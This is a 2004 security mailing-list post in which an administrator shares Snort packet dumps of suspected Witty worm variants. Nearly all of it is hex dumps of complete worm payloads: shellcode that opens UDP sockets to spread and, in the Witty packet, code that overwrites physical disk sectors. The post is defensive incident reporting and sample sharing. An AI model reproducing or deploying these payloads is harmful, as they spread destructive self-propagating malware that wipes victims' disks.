Security Incidents mailing list archives

RE: new variant of witty worm ????

From: Steven Trewick <STrewick () joplings co uk>
Date: Wed, 24 Mar 2004 15:30:50 -0000

(Packet dump to follow ASAP)


As promised, here are my snort traces for the weird packets
that look very much like mutated/mangled versions of the 
'witty' worm.

There are two of the 'variant' packets, then one which looks 
like the same traffic that we saw on Saturday (Although I 
have not had time to confirm this yet)



03/22-21:36:31.155369 211.99.223.42:1045 -> 192.168.0.88:1434
UDP TTL:105 TOS:0x0 ID:35759 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE  ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9  B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01  .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33  ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B  2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64  ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66  hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45  .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50  .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05  ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1  ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B  ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45  E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61  .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2  ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D  ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50  E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA                          .E.P....
 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 

 
03/22-22:26:10.414371 128.11.41.149:2386 -> 192.168.0.88:1434
UDP TTL:109 TOS:0x0 ID:1650 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE  ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9  B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01  .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33  ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B  2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64  ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66  hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45  .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50  .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05  ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1  ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B  ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45  E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61  .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2  ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D  ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50  E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA                          .E.P....         


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 


03/22-22:31:15.196762 155.69.109.158:4000 -> 192.168.0.88:44802
UDP TTL:101 TOS:0x0 ID:2427 IpLen:20 DgmLen:840
Len: 812
05 00 00 00 00 00 00 12 02 00 00 00 00 00 00 00  ................
00 00 00 00 00 02 2C 00 05 00 00 00 00 00 00 6E  ......,........n
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 41 02 05 00 00 00 00 00 00 DE 03 00  ....A...........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00  ................
00 01 00 00 01 00 00 1E 02 20 20 20 20 20 20 20  .........
28 5E 2E 5E 29 20 20 20 20 20 20 69 6E 73 65 72  (^.^)      inser
74 20 77 69 74 74 79 20 6D 65 73 73 61 67 65 20  t witty message
68 65 72 65 2E 20 20 20 20 20 20 28 5E 2E 5E 29  here.      (^.^)
20 20 20 20 20 20 20 89 E7 8B 7F 14 83 C7 08 81         .........
C4 E8 FD FF FF 31 C9 66 B9 33 32 51 68 77 73 32  .....1.f.32Qhws2
5F 54 3E FF 15 9C 40 0D 5E 89 C3 31 C9 66 B9 65  _T>...@.^..1.f.e
74 51 68 73 6F 63 6B 54 53 3E FF 15 98 40 0D 5E  tQhsockTS>...@.^
6A 11 6A 02 6A 02 FF D0 89 C6 31 C9 51 68 62 69  j.j.j.....1.Qhbi
6E 64 54 53 3E FF 15 98 40 0D 5E 31 C9 51 51 51  ndTS>...@.^1.QQQ
81 E9 FE FF F0 5F 51 89 E1 6A 10 51 56 FF D0 31  ....._Q..j.QV..1
C9 66 B9 74 6F 51 68 73 65 6E 64 54 53 3E FF 15  .f.toQhsendTS>..
98 40 0D 5E 89 C3 83 C4 3C 31 C9 51 68 65 6C 33  .@.^....<1.Qhel3
32 68 6B 65 72 6E 54 3E FF 15 9C 40 0D 5E 31 C9  2hkernT>...@.^1.
51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
54 50 3E FF 15 98 40 0D 5E FF D0 89 C5 83 C4 1C  TP>...@.^.......
31 C9 81 E9 E0 B1 FF FF 51 31 C0 2D 03 BC FC FF  1.......Q1.-....
F7 E5 2D 3D 61 D9 FF 89 C1 31 C0 2D 03 BC FC FF  ..-=a....1.-....
F7 E1 2D 3D 61 D9 FF 89 C5 31 D2 52 52 C1 E9 10  ..-=a....1.RR...
66 89 C8 50 31 C0 2D 03 BC FC FF F7 E5 2D 3D 61  f..P1.-......-=a
D9 FF 89 C5 30 E4 B0 02 50 89 E0 6A 10 50 31 C0  ....0...P..j.P1.
50 2D 03 BC FC FF F7 E5 2D 3D 61 D9 FF 89 C5 C1  P-......-=a.....
E8 17 80 C4 03 50 57 56 FF D3 83 C4 10 59 E2 98  .....PWV.....Y..
31 C0 2D 03 BC FC FF F7 E5 2D 3D 61 D9 FF 89 C5  1.-......-=a....
C1 E8 10 80 E4 07 80 CC 30 B0 45 50 68 44 52 49  ........0.EPhDRI
56 68 49 43 41 4C 68 50 48 59 53 68 5C 5C 2E 5C  VhICALhPHYSh\\.\
89 E0 31 C9 51 B2 20 C1 E2 18 52 6A 03 51 6A 03  ..1.Q. ...Rj.Qj.
D1 E2 52 50 3E FF 15 DC 40 0D 5E 83 C4 14 31 C9  ..RP>...@.^...1.
81 E9 E0 B1 FF FF 3D FF FF FF FF 0F 84 37 FF FF  ......=......7..
FF 56 89 C6 31 C0 50 50 2D 03 BC FC FF F7 E5 2D  .V..1.PP-......-
3D 61 D9 FF 89 C5 D1 E8 66 89 C8 50 56 3E FF 15  =a......f..PV>..

C4 40 0D 5E 31 C9 51 89 E2 51 52 B5 80 D1 E1 51  .@.^1.Q..QR....Q
B1 5E C1 E1 18 51 56 3E FF 15 94 40 0D 5E 56 3E  .^...QV>...@.^V>
FF 15 38 40 0D 5E 5E 5E E9 AC FE FF FF 63 76 07  ..8@.^^^.....cv.
5E E9 21 FE FF FF 00 43 66 6A 76 63 6C 62 34 31  ^.!....Cfjvclb41
50 51 35 30 6A 48 31 50 63 34 50 51 55 59 48 78  PQ50jH1Pc4PQUYHx
37 74 65 4F 7A 54 53 54 59 54 65 4C 4D 41 0D 0A  7teOzTSTYTeLMA..
44 6C 44 33 52 37 6C 56 74 42 43 75 6B 6B 68 64  DlD3R7lVtBCukkhd
7A 2B 32 76 6F 75 30 33 41 63 35 57 4F 52 6B 75  z+2vou03Ac5WORku
71 72 67 64 4B 72 75 31 5A 49 4F 43 6C 53 52 2F  qrgdKru1ZIOClSR/
78 51 4F 69 4B 6F 36 48 7A 4A 75 67 52 72 49 34  xQOiKo6HzJugRrI4
73 37 4F 6B 53 4B 77 50 71 4C 75 34 0D 0A 35 62  s7OkSKwPqLu4..5b
61 4E 62 52 30 67 50 4E 59 50 40 00 34 06 B6 62  aNbR0gPNYP@.4..b
40 44 52 19 92 8E 01 A0 11 00 07 00 46 00 00 00  @DR.........F...
46 00 00 00 80 00 00 00 02 00 00 00              F...........
 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+




</code>
The information contained in this e-mail is confidential and may be privileged, it is intended for the addressee only. 
If you have received this e-mail in error please delete it from your system. The statements and opinions expressed in 
this message are those of the author and do not necessarily reflect those of the company. Whilst Joplings Group 
operates an e-mail anti-virus program it does not accept responsibility for any damage whatsoever that is caused by 
viruses being passed.
joplings.co.uk


---------------------------------------------------------------------------
Free 30-day trial: firewall with virus/spam protection, URL filtering, VPN,
wireless security

Protect your network against hackers, viruses, spam and other risks with Astaro
Security Linux, the comprehensive security solution that combines six
applications in one software solution for ease of use and lower total cost of
ownership.

Download your free trial at 
http://www.securityfocus.com/sponsor/Astaro_incidents_040301
----------------------------------------------------------------------------

Current thread:

new variant of witty worm ???? Steven Trewick (Mar 23)
- <Possible follow-ups>
- RE: new variant of witty worm ???? Steven Trewick (Mar 24)
- RE: new variant of witty worm ???? Kowsik Guruswamy (Mar 24)
  - Re: new variant of witty worm ???? Gadi Evron (Mar 24)